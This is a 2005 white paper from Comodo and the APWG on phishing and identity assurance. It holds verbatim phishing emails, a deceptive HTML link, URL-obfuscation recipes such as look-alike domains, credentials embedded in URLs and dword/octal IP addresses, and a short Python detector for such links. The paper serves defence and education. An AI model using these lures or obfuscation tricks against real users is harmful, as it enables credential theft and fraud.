© 2005 Comodo Inc. - APWG · docs.apwg.org/sponsors_technical_papers/Identity...


PREFACE

Identity theft has always been high on the agenda of any criminal. Once you have access to someone’s personal data and then move on to impersonate them, you have near anonymity to commit your crime.

One of the most prolific attack methods used to obtain this data over the past 12+ months has been the Phishing attack. Specific attacks aimed at UK banking customers appeared towards the end of 2003, increasing with a vengeance during the first months of 2004 and steadily thereafter. Initially thought of as ‘all a fuss about nothing’, this one particular threat type, ‘Phishing’, is now headline news on almost a daily basis.

This white paper specifically addresses identity assurance on the Internet, highlighting the potentially devastating consequences of today’s browser tool set not providing any method of verification.

The underlying architecture of the browser itself is the weakest point, wherein nothing that you ‘see’ within the browser can be trusted.

The self-same visual interface used every day by billions of Internet users provides no method of assurance as to the validity of the content being viewed – there is no trusted output mechanism, there is no identity assurance mechanism and therefore there is no verification.

Phishing scams have been increasing both in number and in level of sophistication, with a recent study by Gartner showing that some 57 Million US Internet users have identified the receipt of an e-mail linked to a Phishing scam. Studies by the Anti-Phishing Working Group have concluded that scams can yield up to 5% of all message receipts, and as with all criminal enterprises, if there is sufficient money to be made from Phishing attacks, then spoofed web sites, fraudulent banner advertising and other social engineering methods will be used more frequently to fuel ID theft.

Methods exist to provide a ‘degree’ of assurance as to the legitimacy of a web site when the web server is secured with an SSL certificate, but this makes an assumption that the certificate was provided by a high assurance certification authority. Browsers do not differentiate between high and low assurance providers, and likewise no methods exist to verify the actual content on the page. After all, it has long been said ‘don’t believe everything you read’, so maybe a more modern rendition in relation to the Internet should be:

‘don’t believe anything you see’

ABBREVIATIONS

CP – Certificate Policy
CA – Certificate Authority
CPS – Certification Practice Statement
CRL – Certificate Revocation List
CSR – Certificate Signing Request
CVC – Content Verification Certificate
HTTPS – Hypertext Transfer Protocol with SSL
I&A – Identification and Authentication
ISP – Internet Service Provider
OID – Object Identifier
OCSP – Online Certificate Status Protocol
PKI – Public Key Infrastructure
RA – Registration Authority
SSL – Secure Socket Layer
TLD – Top Level Domain
URL – Uniform Resource Locator
VE – Verification Engine

CONTENTS

PREFACE
ABBREVIATIONS
CONTENTS
IDENTITY THEFT & IDENTITY ASSURANCE
  A growing on-line community
  A growing on-line threat
  Phishing History
  Example Scams migrating to the Internet
  Spam e-mail as a transport method
  A Real-life Phishing Example
  Web-based Delivery
  Fake Banner Advertising
  IRC and Instant Messaging
  Why is Identity Assurance so important?
  Verification in the ‘real’ world
  A real world example of ‘Cut and Paste’
ATTACK VECTORS & SOLUTIONS
  Man-in-the-middle Attacks
    DNS Cache Poisoning or ‘host.ini’ file manipulation
    Browser Proxy Configuration
    URL Obfuscation
    Transparent Proxies
  URL Obfuscation Attacks
    Bad Domain Names
    Friendly Login URLs
    Third-party Shortened URLs
    Host Name Obfuscation
    URL Obfuscation
    IDN Obfuscation Methods
  Cross-site Scripting Attacks
    Preset Session Attack
    Hidden Attacks
    Hidden Frames
    Overriding Page Content
    Graphical Substitution
  Observing Customer Data
    Key-logging
    Screen Grabbing
    Client-side Vulnerabilities
IDENTITY ASSURANCE SOLUTIONS
  Today’s portfolio of solutions
  Client/User
    Desktop – Endpoint Security Solutions
    Digitally Signing e-mails
    User Education – General Security Awareness
    The choice of Internet Browser
  Server/Enterprise
    Secure Socket Layer Certificates
    Authentication of an organization
    Site Identity Assurance Tools
    Toolbars
    Managed Identity Assurance Services
    VERIFIED by VISA
    MASTERCARD SECURECODE
    Why is it possible to launch this type of attack?
    What are Content Verification Certificates?
SUMMARY


IDENTITY THEFT & IDENTITY ASSURANCE

The number of attack vectors by which identity theft is perpetrated is increasing. Individuals and enterprises alike need to be aware of the types of attack and of the tools required to help them avoid becoming a victim.

A growing on-line community

Established through a series of sporadic jumps over the last decade, including complete cycles of boom and bust for many dot com companies, the success of the Internet as a medium for the mass delivery of electronic content cannot be denied. The ability to reach a global audience on a global scale has opened up a multitude of new business models, each of which has spawned its own commercial ecosystem to support the pull from newly emerging markets. With the possibility of mass market success on a global scale equally attainable for companies of all sizes, coupled with the attractiveness of minimal set-up costs, 24 x 7 operation and the seemingly insatiable appetite of over 1 Billion potential customers, the first quarter of 2004 saw over 4.7 Million new domain name registrations, the highest in the history of the Internet.

A growing on-line threat

The attractiveness of the medium also has a darker side, in that Internet scams, Internet-borne worms, viruses, Trojans, Spyware and other forms of malicious software have not just mirrored the growth, they have outpaced it. An extremely lucrative business model for organized crime, with the potential to provide funding to terrorist organizations, the Internet will never reach its full potential unless ubiquitous identity assurance methods are developed and implemented quickly across the on-line community.

In particular, the acceleration of Phishing attacks now creates headline news on a daily basis, with the latest findings showing losses of $500m for US consumers. A survey of 1,335 US net users conducted by the think tank the Ponemon Institute found that three in four (76 per cent) are seeing an increase in spoofing and Phishing incidents and that 35 per cent receive fake emails at least once a week.

In 1940 David W Maurer published his classic study of the con-men of the early 20th Century. In it he described the ‘Autograph’, a con in which the ‘mark’ is induced to sign his autograph on a piece of paper, which is then converted to a negotiable cheque. Now, in the 21st century, the autograph is being used on a huge scale across the Internet – its modern name – Phishing.

With the high fear-factor associated with possible Phishing scams, organisations that take a proactive stance in protecting their customers’ personal information are likely to benefit from higher levels of trust and confidence in their services. In an era of shifting customer allegiances, protection against phishing scams may just become a key deciding factor in gaining their loyalty.

Phishing History

Originally the word “phishing” comes from the analogy whereby early Internet criminals used email lures to “phish” for passwords and financial data from a sea of Internet users. The use of “ph” rather than “f” is most likely linked to popular hacker naming conventions such as “Phreaks”, which traces back to early hackers who were involved in “phreaking” – the hacking of telephone systems.

The term was coined in the 1996 timeframe by hackers who were stealing America Online (AOL) accounts by scamming passwords from unsuspecting AOL users. The popularised first mention on the Internet of phishing was made in the alt.2600 hacker newsgroup in January 1996; however, the term may have been used even earlier in the popular hacker newsletter “2600”.

It used to be that you could make a fake account on AOL so long as you had a credit card generator. However, AOL became smart. Now they verify every card with a bank after it is typed in. Does anyone know of a way to get an account other than phishing?

—mk590, "AOL for free?", alt.2600, January 28, 1996

By 1996, hacked accounts were referred to as "phish", and by 1997 phish were actively being traded between hackers as a form of electronic currency. Phishers would routinely trade 10 working AOL phish for a piece of hacking software or warez (stolen copyrighted applications and games).

The earliest media citation referring to phishing wasn’t made until March 1997:

The scam is called 'phishing' — as in fishing for your password, but spelled differently — said Tatiana Gau, vice president of integrity assurance for the online service.

—Ed Stansel, "Don't get caught by online 'phishers' angling for account information," Florida Times-Union, March 16, 1997

As we will illustrate in the forthcoming sections, the definition of what constitutes a Phishing attack has changed over time and expanded beyond the original concept. The term Phishing now covers not only obtaining user account details, but access to all personal and financial data. Now ‘the mark’, i.e. the Internet user, is not only tricked into replying to emails to give up passwords and credit card details, but is presented with spoofed websites, the installation of Trojan horse key-loggers and screen capturers, and man-in-the-middle data proxies – delivered through any electronic communication channel.

Due to the Phishers’ high success rate, an extension to the classic phishing scam now includes the use of fake job sites or job offers. Applicants are enticed with the notion of making a lot of money for very little work – just creating a new bank account, taking the funds that have been transferred into it (less their personal commission) and sending them on as an international money order – classic money laundering techniques.

Social Engineering Factors

Attacks rely upon a mix of technical deceit and social engineering practices. In the majority of cases the attacker must persuade the victim to intentionally perform a series of actions that will provide access to confidential information. Communication channels such as e-mail, web-pages, IRC and instant messaging services are popular. In all cases the Phisher must impersonate a trusted source (e.g. the helpdesk of their bank, automated support response from their favourite online retailer, etc.) for the victim to believe.


To date, the most successful Phishing attacks have been initiated by e-mail – where the Phisher impersonates the sending authority (e.g. spoofing the source email address and embedding appropriate corporate logos) and lures the victim to a spoofed web site.

Some recent statistics (*Figures for October 2004)

Number of active Phishing sites*: 1142
Average monthly growth rate July 2004 - Oct 2004: 25%
Number of brands hijacked by Phishing campaigns*: 44
Number of brands comprising the top 80% of campaigns*: 6
Country hosting the most Phishing websites*: USA
Contain some form of target name in the URL: 20.1%
No hostname, just an IP address: 63%
Percentage of sites not using port 80: 12.2%
Average time online for a site: 6.4 days
Longest time online for a site: 31 days

For example, the victim receives an email supposedly from [email protected] (address is spoofed) with the subject line 'security update’, requesting them to follow a URL to a site www.abcbank-validate.info (a domain name that belongs to the attacker – not the bank) and provide their banking PIN number.

However, the Phisher has many other nefarious methods of social engineering victims into surrendering confidential information. In the real example below, the email recipient is likely to have believed that their banking information has been used by someone else to purchase unauthorized services. The victim would then attempt to contact the email sender to inform them of the mistake and cancel the transaction. Depending upon the specifics of the scam, the Phisher would ask (or provide an online “secure” web page) for the recipient to type-in their confidential details (such as address, credit card number and security code, etc.), to reverse the transaction – thereby verifying the live email address (and potentially selling this information on to other spammers) and also capturing enough information to complete a real transaction.

Subject: Web Hosting – Receipt of Payment QdRvxrOeahwL9xaxdamLRAIe3NM1rL

Dear friend,

Thank you for your purchase! This message is to inform you that your order has been received and will be processed shortly. Your account is being processed for $79.85, for a 3 month term. You will receive an account setup confirmation within the next 24 hours with instructions on how to access your account. If you have any questions regarding this invoice, please feel free to contact us at tekriter.com. We appreciate your business and look forward to a great relationship!

Thank You,
The Tekriter.com Team

ORDER SUMMARY
-------------
Web Hosting............. $29.85
Setup................... $30.00
Domain Registration..... $20.00
Sales Date.............. 08/04/2004
Domain.................. nashshanklin.com
Total Price............. $79.85
Card Type............... Visa

Example Scams migrating to the Internet

Here are a few of the more ‘real world’ scams that have now migrated to the Internet, due to the proven success of the social engineering attack vectors used and the ease with which spam can be sent to proliferate the attack.

• Advance Fee Loans. Legitimate lenders don’t usually ask for upfront fees. If there is an application or processing fee, it should be very small – not hundreds or even thousands of dollars.

• Bogus Credit Card Offers - A “gold” or “silver” card may not be what users think. Fraudulent credit card vendors promise “gold” or “silver” cards from major card issuers. What is sometimes received – if anything at all – is a gold or silver-colored charge card that can only be used to buy overpriced goods from the company’s own catalog.

• Business Opportunities & Franchises - The Federal Trade Commission’s (FTC) Franchise Rule requires franchise and business opportunity sellers to give you detailed written information, known as a “disclosure document,” at least 10 days before any money should change hands. Exciting offers of high return may be erroneous.

• Buyers Clubs – Users should be aware of “welcome packages.” Sometimes what looks to be an offer to join a buyers club may actually be a notice that they have already enrolled! Users should always read any documentation carefully!

• Charity Scams – Users approached by unfamiliar charities should always check them out. Most states require charities to register with them and file annual reports showing how they use donations. Users should ask state or local consumer protection agencies how to get this information.

• Computer Equipment and Software - If the seller is unfamiliar users again should check with state or local consumer protection agencies and the Better Business Bureau. Some Web sites have feedback forums, which can provide useful information about other people’s experiences with particular sellers. Users should always obtain the physical address and phone number in case of later problems.

• Fake Check Scams - Here an unknown seller would offer to pay by check so long as some money is wired back.

Spam e-mail as a transport method

Spam levels are now anywhere between 45% and 75% of all e-mail moving over the Internet, and with higher levels of ‘automation’ involved plus the negligible costs involved it’s easy to see why e-mail is a preferred method for Phishers. Using techniques and tools used by Spammers, Phishers can deliver specially crafted e-mails to millions of legitimate “live” email addresses within a few hours (or minutes using distributed Trojan networks). In many cases, the lists of addresses used to deliver the Phishing emails are purchased from the same sources as conventional spam.


Utilizing well known flaws in the common mail server communication protocol (SMTP), Phishers are able to create emails with fake “Mail From:” headers and impersonate any organization they choose. In some cases, they may also set the “RCPT To:” field to an email address of their choice (one from which they can pick up email), whereby any customer replies to the phishing email will be sent to them. The growing press coverage of phishing attacks has meant that most customers are very wary of sending confidential information (such as passwords and PIN information) by email – however, it is still successful in many cases.

Techniques used within Phishing emails:

• Official looking and sounding emails

• Copies of legitimate corporate emails with minor URL changes

• HTML based email used to obfuscate target URL information

• Standard virus/worm attachments to emails

• A plethora of anti spam-detection inclusions

• Crafting of “personalised” or unique email messages

• Fake postings to popular message boards and mailing lists

• Use of fake “Mail From:” addresses and open mail relays for disguising the source of the email

A Real-life Phishing Example

The following is an email sent to many thousands of Westpac banking customers in May 2004. Whilst the language sophistication is poor (probably due to the writer not being a native English speaker), many recipients were still fooled.

Subject: Westpac official notice

Westpac AustraIia's First Bank

Dear cIient of the Westpac Bank,

The recent cases of fraudulent use of clients accounts forced the Technical services of the bank to update the software. We regret to acknowledge, that some data on users accounts could be lost. The administration kindly asks you to follow the reference given below and to sign in to your online banking account:

https://oIb.westpac.com.au/ib/defauIt.asp

We are gratefuI for your cooperation. Please do not answer this message and follow the above mentioned instructions.

Copyright © 2004 - Westpac Banking Corporation ABN 33 007 457 141.

Things to note with this particular attack:

• The email was sent in HTML format (some attacks use HTML emails that are formatted to look like plain text – making it much harder for the recipient to identify the hidden “qualities” of the email’s dynamic content).

• Lower-case L’s have been replaced with upper-case I’s (l & I). This is used to help bypass anti-spam filters, and in most fonts (except for the standard Courier font used in this example) it fools the recipient into reading them as L’s.

[Figure: ‘Default’ (correct) shown beside ‘DefauIt’ (incorrect), illustrating how the substitution looks in a proportional font.]

• Hidden within the HTML email were many random words. These words were set to white (on the white background of the email) so were not directly visible to the recipient. The purpose of these words was to help bypass standard anti-spam filters.

• Within the HTML-based email, the URL link https://oIb.westpac.com.au/ib/defauIt.asp in fact points to an escape-encoded version of the following URL:

http://olb.westpac.com.au.userdll.com:4903/ib/index.htm

• This was achieved using standard HTML coding such as:

<a href="http://olb.westpac.com.au.userdll.com:4903/ib/index.htm">https://oIb.westpac.com.au/ib/defauIt.asp</a>

• The Phishers have used a sub-domain of USERDLL.COM in order to lend the illusion of it really being the Westpac banking site. Many recipients are likely to be fooled by olb.westpac.com.au.userdll.com.

• Rather than use the standard HTTP port, port 4903 was most likely used for the attack because the fake site was hosted on a third-party PC that had been previously compromised by an attacker.

• Recipients that clicked on the link were then forwarded to the real Westpac application. However, a JavaScript popup window containing a fake login page was presented to them. Expert analysis of this JavaScript code identified that pieces of it had been used previously in another Phishing attack – one targeting HSBC. (As the original WestPac Phishing mail is no longer in circulation, a more recent Phishing mail and the resulting attack pop-up are illustrated below and opposite to illustrate the issues.)

• This fake login window was designed to capture and store the recipient’s authentication credentials. The JavaScript also submitted the authentication information to the real application and forwarded them on to the site. Therefore the recipient would be unaware that their initial connection had been intercepted and their credentials captured.
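The tricks catalogued in the list above (a link whose visible text mimics the bank's URL while its href goes elsewhere, a brand name buried as a sub-domain of an attacker-owned domain, the l/I substitution and a non-standard port) can all be checked mechanically at a mail gateway before a message reaches the customer. The script below is an added example written for this edit, not code from the paper or from Comodo; the sample HTML is constructed from the Westpac anchor quoted above, and the protected-brand list, the short two-level public-suffix list and the set of "expected" ports are assumptions chosen for the demonstration.

```python
"""Heuristic checks for the HTML-link tricks seen in the Westpac mail.

Added illustration, not Comodo's code. Sample input and the small
reference lists below are constructed/assumed for this demo.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the Westpac anchor, with visible text mimicking a
# westpac.com.au URL (using I for l) while the href goes elsewhere.
SAMPLE_HTML = (
    '<p>Dear cIient of the Westpac Bank, follow the reference below:</p>'
    '<a href="http://olb.westpac.com.au.userdll.com:4903/ib/index.htm">'
    'https://oIb.westpac.com.au/ib/defauIt.asp</a>'
)

# Assumed: brands the receiving organisation wants to protect.
PROTECTED_BRANDS = {"westpac.com.au"}
# Assumed: two-level public suffixes this demo knows about.
TWO_LEVEL_SUFFIXES = {"com.au", "co.uk"}
# Assumed: ports a legitimate web link is expected to use.
EXPECTED_PORTS = {None, 80, 443}


class AnchorExtractor(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:          # only text inside an <a>
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def registered_domain(host):
    """Crude registrable-domain guess: the last two labels, or three when
    the host ends in one of the assumed two-level suffixes."""
    labels = host.lower().split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LEVEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def homoglyph_fix(text):
    """Undo the upper-case-I-for-lower-case-l substitution: an 'I' sitting
    between two lower-case letters is read as an 'l'."""
    return re.sub(r"(?<=[a-z])I(?=[a-z])", "l", text)


def analyse(html):
    """Return a list of human-readable findings for the anchors in a body."""
    parser = AnchorExtractor()
    parser.feed(html)
    findings = []
    for href, text in parser.anchors:
        real = urlparse(href)
        real_host = real.hostname or ""
        # 1. Visible text looks like a URL but names a different host.
        shown = urlparse(homoglyph_fix(text))
        if shown.scheme and shown.hostname and shown.hostname != real_host:
            findings.append(
                f"link text shows {shown.hostname} but href goes to {real_host}")
        # 2. A protected brand appears inside a host owned by someone else.
        reg = registered_domain(real_host)
        for brand in PROTECTED_BRANDS:
            if brand in real_host and reg != brand:
                findings.append(f"brand {brand} embedded in host of {reg}")
        # 3. Unexpected port, as used by the compromised third-party host.
        if real.port not in EXPECTED_PORTS:
            findings.append(f"unexpected port {real.port}")
        # 4. l/I substitution in the visible link text.
        if homoglyph_fix(text) != text:
            findings.append("upper-case I used in place of lower-case l in link text")
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_HTML):
        print(finding)
```

Running analyse(SAMPLE_HTML) yields four findings, one per trick; the same anchor rewritten so that text and href both point at olb.westpac.com.au yields none. In a real gateway the crude registered_domain guess should be replaced by a full public-suffix list, and the homoglyph check extended beyond the single l/I substitution this particular mail relied on.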


[Figure: a more recent Phishing mail, correctly identified as SPAM, yet graphically convincing and producing the same pop-up effect in the browser as the WestPac example.]

Another recent example:

[Figure: the real web site is opened in the background, with the Phishing pop-up in front of it.]

Web-based Delivery

With popular search engines now holding some 8,058,044,651 individual web pages, with an average of 50,000 new web sites being registered every day, and with greater and greater levels of automation involved in the registration of those new sites, policing the Internet to establish legitimacy is becoming ever more difficult. Taking advantage of these facts, an increasingly popular method of conducting Phishing attacks is through malicious web-site content. This content may be included within a web-site operated by the Phisher, in a third party site hosting some embedded content, or simply on a compromised web site where the owner is unaware of the content now being delivered.

Web-based delivery techniques include:

• The inclusion of HTML disguised links (such as the one presented in the Westpac e-mail example earlier) within popular web-sites and message boards.

• The use of third-party supplied, or fake, banner advertising graphics to lure customers to the Phisher’s web-site.

• The use of web-bugs (hidden items within the page – such as a zero-sized graphic) to track a potential customer in preparation for a phishing attack.

• The use of pop-up or frameless windows set above legitimate sites (initiated via a simple JavaScript call) to disguise the true source of the Phisher’s message, or indeed slightly more complex pop-up windows with embedded graphics replacing the legitimate task bar, status bar and/or address bar.

• Embedding malicious content within the viewable web-page that exploits a known vulnerability within the customer’s web browser software and installs software of the Phisher’s choice (e.g. key-loggers, screen-grabbers, back-doors and other Trojan horse programs).

• Abuse of trust relationships within the customer’s web-browser configuration to make use of site-authorised scriptable components or data storage areas.

• The use of cross site scripting techniques (XSS) to provide legitimacy to some portion of a spoofed web site.

Fake Banner Advertising

Everybody is familiar with banner advertising on web sites, and how often do we question the legitimacy of an advertisement? It is therefore a very simple method whereby Phishers redirect customers to fake web-sites to capture confidential information. Using copied banner advertising, and placing it on popular websites, all that is necessary is some simple URL obfuscation technique to obscure the final destination (see a later section).

Banner advertising is an extremely popular service and highly lucrative and therefore attractive to websites with high traffic figures. It is a simple proposition for the Phisher to create their own online account (providing a graphic such as the one above and a URL of their choice) and have the service provider automatically distribute it to many of their managed websites. Using stolen credit cards or other banking information, the Phisher can easily conceal their identity from law enforcement agencies.


IRC and Instant Messaging

Internet Relay Chat (IRC) and Instant Messaging (IM) forums are becoming ever more popular due to their increased usage by home users, the primary target of the Phisher. As more functionality is included within the software, specialist Phishing attacks will increase, certainly where embedded dynamic content (e.g. graphics, URLs, multimedia includes, etc.) can be sent by channel participants. Phishers may use the same Phishing techniques as in standard web-based attacks.

The common usage of Bots (automated programs that listen and participate in group discussions) in many of the popular channels, means that it is very easy for a Phisher to anonymously send semi-relevant links and fake information to would-be victims.

Also, as can be seen below, Malware (the group term for Spyware, Viruses, Trojans, Worms and other similar code) is on the increase through ‘shared drives’: whereas once the humble floppy disk was the transport mechanism, now USB keyfobs with far greater storage capabilities are a major source of viral infections within the enterprise.

[Chart: Malware Distribution by Vector. Source: Trend Micro World Malware Tracking Center]

Trojaned Hosts

The huge increase in the adoption of DSL/cable based Internet connection methods for home users has allowed Phishers, Spammers, Warez Pirates, DDoS Bots, etc. to make use of a far wider base from which to propagate an attack. Consequently, tracking back a Phishing attack to an individual is extremely difficult.

It is important to note that the installation of Trojan horse software is on the increase, despite the efforts of large anti-virus companies. Many malicious or criminal groups have developed highly successful techniques for tricking home users into installing the software, and now operate large networks of Trojan deployments (networks consisting of thousands of hosts are not uncommon) capable of being used as Phishing email propagators or even hosting fraudulent web-sites.

Why is Identity Assurance so important?

Identity assurance is paramount to the success of the Internet. With legislation now in place in the United States across many industry sectors, including well publicized bills such as the Health Insurance Portability and Accountability Act (HIPAA), confidentiality and security concerns cannot be fully addressed unless it is possible to be assured of the identity of the party to which information is submitted:

Verification is required.

Verification in the ‘real’ world.

To better illustrate the significance of verification, let’s take an example familiar to everyone: currency.

How to Detect Counterfeit Currency – Advice from the US treasury and the Department of Homeland Defense

http://www.ustreas.gov/usss/money_detect.shtml

“The public has a role in maintaining the integrity of our currency. You can help guard against the threat from counterfeiters by becoming more familiar with United States currency. Look at the money you receive. Compare a suspect note with a genuine note of the same denomination and series, paying attention to the quality of printing and paper characteristics. Look for differences.

Portrait

The genuine portrait appears lifelike and stands out distinctly from the background. The counterfeit portrait is usually lifeless and flat. Details merge into the background which is often too dark or mottled.

Federal Reserve and Treasury Seals

On a genuine bill, the saw-tooth points of the Federal Reserve and Treasury seals are clear, distinct, and sharp. The counterfeit seals may have uneven, blunt, or broken saw-tooth points.

Border

The fine lines in the border of a genuine bill are clear and unbroken. On the counterfeit, the lines in the outer margin and scrollwork may be blurred and indistinct.


Serial Numbers

Genuine serial numbers have a distinctive style and are evenly spaced. The serial numbers are printed in the same ink color as the Treasury Seal. On a counterfeit, the serial numbers may differ in color or shade of ink from the Treasury seal. The numbers may not be uniformly spaced or aligned.

Paper

Genuine currency paper has tiny red and blue fibers embedded throughout. Often counterfeiters try to simulate these fibers by printing tiny red and blue lines on their paper. Close inspection reveals, however, that on the counterfeit note the lines are printed on the surface, not embedded in the paper. It is illegal to reproduce the distinctive paper used in the manufacturing of United States currency.”

A real world example of ‘Cut and Paste’

Genuine paper currency is sometimes altered in an attempt to increase its face value. A common method is to glue numerals from higher denomination notes to the corners of lower denomination notes.

Given enough resources (time and effort), each of the visual elements above can be circumvented, so additional techniques are used both in the US and in other countries, such as ultraviolet features, metallic threads and foil holograms. These additional protection mechanisms require alternative forms of verification, most of which are not available to the average user.

With billions of dollars in trade now moving across the Internet daily, what methods of verification are available? The following sections look at the attack vectors used and at solutions that go some way towards providing a degree of assurance; but, as demonstrated at the end of each section, changes in business processes, cost cutting and methods of circumvention are able to defeat most of the current crop of commercially available safeguards.


ATTACK VECTORS & SOLUTIONS

Phishing attacks use a combination of social engineering and technical trickery to dupe the victim. These attacks are becoming more sophisticated and plausible with every passing day and now draw on some of the most advanced programming techniques around. Some of the most common attack methods are discussed below. The next section then details solutions, together with a summary of their relative merits against these attack vectors. Common attacks include:

• Man-in-the-middle Attacks

• URL Obfuscation Attacks

• Cross-site Scripting Attacks

• Preset Session Attacks

• Observing Customer Data

• Client-side Vulnerability Exploitation

Man-in-the-middle Attacks

A very successful attack method applicable to a wide variety of scenarios is the man-in-the-middle attack. It involves a malicious attacker intercepting communications and fooling both parties into believing they are communicating directly with each other, when in fact everything passes through, and is monitored by, the attacker. From this vantage point, the attacker can observe and record every transaction and item of information submitted by the victim, then proxy it to the genuine web application (for example, a payment gateway) in real time. It is analogous to someone intercepting post and then resealing the envelopes.

The customer remains oblivious to the man-in-the-middle attack because the customer connects to the attacker's server as if it were the real site. The attacker's server makes a simultaneous connection to the real site, relaying everything passed to it. The attack applies to HTTP and HTTPS alike, with one practical difference: on HTTPS the proxy must terminate the TLS connection itself, so the victim either has to accept a certificate warning or has to be sent to a domain for which the attacker holds a valid certificate.

Obviously, for man-in-the-middle attacks to be successful, the attacker must be able to redirect the victim through his own spurious proxy server. This can be achieved using a number of techniques, including:

• DNS Cache Poisoning or host file manipulation

• Browser Proxy Configuration

• URL Obfuscation

• Transparent Proxies

DNS Cache Poisoning or hosts file manipulation

Harder to implement, DNS cache poisoning disrupts normal traffic routing by injecting false IP addresses for key domain names into a resolver's cache. DNS (the Domain Name System) maps Fully Qualified Domain Names (FQDNs) to IP addresses; resolvers query the hierarchy of authoritative servers and cache the answers locally for speed. Every machine also has a local hosts file (on Windows, %SystemRoot%\System32\drivers\etc\hosts) that is consulted before DNS is asked at all, and Trojans and other malware routinely rewrite the hosts file on an infected system so that a bank's name resolves to the attacker's server.

Browser Proxy Configuration

Browsers such as Internet Explorer can be configured so that all web traffic is forced through a proxy. Browser proxy configuration attacks override the user's settings to send all traffic through a server nominated by the attacker. The victim's settings are usually altered before the phishing email arrives, in order to 'prime' the victim for a successful attack.

Fortunately, this attack is not transparent to the user and can be detected by a user reviewing their browser settings and identifying the ‘foreign’ proxy server.

URL Obfuscation

URL obfuscation involves deceiving the customer into connecting to the attacker's proxy server rather than the genuine server. Attackers typically use URLs so similar to the original that they are overlooked at first glance. For example, the victim may follow a link to http://www.abcbank.com.ch/ instead of http://www.abcbank.com/


Transparent Proxies

Transparent proxies differ from normal proxy servers in that they are 'invisible' to the end user and cannot be detected by reviewing browser settings: the user enters no network settings for their HTTP traffic to be captured. Because they are built into the network architecture, all port 80 traffic must flow through them. Such a proxy is usually situated en route to the real server (e.g. a corporate gateway or an intermediary ISP) and intercepts all outbound HTTP data. HTTPS traffic passes through it too, but its content stays encrypted unless the proxy also terminates TLS, which the browser will flag unless the proxy's certificate chains to a CA the client trusts. This architecture has gained popularity as 'content filtering' solutions have been introduced across enterprises. The advantage of a transparent proxy is that no configuration changes are required at the customer end, which makes it paramount that any content filter is free from vulnerabilities: a compromised one sits in the perfect man-in-the-middle position.

URL Obfuscation Attacks

Many Phishing attacks succeed by duping the recipient to follow a hyperlink (URL) to the attacker’s server, whilst under the impression that they are connected to the legitimate server. Phishers can now draw upon a wide range of techniques to obfuscate a URL and camouflage the true destination of a user’s web request.

The most common methods of URL obfuscation include:

• Bad domain names

• Friendly login URLs

• Third-party shortened URLs

• Host name obfuscation

• URL obfuscation

• IDN obfuscation methods

Bad Domain Names

This involves registering a domain with a URL that closely resembles the real organization’s URL with the specific intention of fooling customers into believing they are on the genuine site.

(See the Validation section on Page 18)

For example, the fictional financial organization ABCBank has the registered domain abcbank.com and the customer transactional site http://privatebanking.abcbank.com. The phisher then sets up a fake server and could legitimately register any of the following names to confuse the customer:

• http://privatebanking.abcbank.com.ch

• http://abcbank.privatebanking.com

• http://privatebanking.abcbonk.com

• http://privatebanking.abcbánk.com

• http://privatebanking.abcbank.hackproof.com

With increasing volumes and falling prices, Domain Name Registrars (DNRs) are internationalizing their services for cross-border trade, and it is now possible to register domain names in other languages and their character sets. For example, the Cyrillic 'o' looks identical to the standard ASCII 'o' but is a different character for domain registration purposes, as pointed out by a company that registered microsoft.com in Russia a few years ago. Finally, it is worth noting that even the standard ASCII character set allows for ambiguities such as upper-case 'I' and lower-case 'l', as shown earlier in this section.

Friendly Login URLs

One method of user authentication embeds both login and password details in the URL. Generally, such URLs take the form scheme://username:password@hostname/path.

By substituting the username and password fields with details that seem consistent with the target organization, phishers can often fool customers into believing they are at the genuine site.

For example, the following URL sets username = abcbank.com and password = ebanking, while the destination hostname is fakesite.com:

http://abcbank.com:ebanking@fakesite.com/phishing/fakepage.htm

Because of its success in phishing, many browsers have since ceased support for this method of user authentication, or strip or warn on the username part of the URL.

Third-party Shortened URLs

Many web applications produce long and complex URLs that wrap badly in many email clients. This often causes the URL to 'break', forcing the recipient to recreate the original link by cutting and pasting it into the browser. To prevent email clients breaking such URLs, many third-party organizations provide free services that shorten them to a manageable length. Common free services include http://smallurl.com and http://tinyurl.com

Phishers have taken to sending emails with deliberately broken or incorrect complex URLs alongside a ‘shorter’ version, which actually points to the spoof website.

Dear eBay member,

As part of our continuing commitment to protect your account and to reduce the instance of fraud on our website, we are undertaking a periodic review of our member’s accounts. You are requested to visit our site by following the link given below http://arribba.cgi3.ebay.com/aw-cgi/ebayISAPI.dll?UpdateInformationConfirm&bpuser=1&Sess=asp04&passwordvalidate=true&changepassword=true

If this URL does not work, please use the following link which will redirect to the full page detailed above:

http:tinyurl.com/7tyk

Please fill in the required information. This is required for us to continue to offer you a safe and risk free environment to send and receive money online, and maintain the eBay experience. Thank you

Copyright © 1995-2003 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay User Agreement and Privacy Policy .


Host Name Obfuscation

The majority of Internet users navigate to sites by typing the Fully Qualified Domain Name (FQDN) into their browser, e.g. www.phishingwebsite.com. However, for the browser to actually reach the intended site, it must resolve the FQDN to an IP address such as 103.126.134.21, which in this example equates to www.fakesite.com.

Such resolution is achieved through the Domain Name System (DNS), and it provides phishers with an effective way of obfuscating a host and hiding the real destination of a link.

E.g. this URL may well seem suspicious to the average recipient:

http://abcbank.com:[email protected]/login.htm

However, 're-phrased' in the following format, it not only divulges much less information about the true destination but also looks more convincing:

http://abcbank.com:[email protected]/login.htm

Even customers who are familiar with dotted-decimal notation (000.000.000.000) may not be familiar with alternative representations. Using such alternative IP representations within a URL makes it possible to obscure the host destination even further. Alternative formats include:

• Dword - 'double word': the 32-bit address treated as a single number (two 16-bit words) and written in decimal (base 10),

• Octal - address expressed in base 8, and

• Hexadecimal - address expressed in base 16.

For example, the fake website http://www.phishingwebsite.com resolves to 210.134.161.35, which can alternatively be represented as:

• Decimal – http://210.134.161.35/

• Dword – http://3532038435/

• Octal – http://0322.0206.0241.0043/

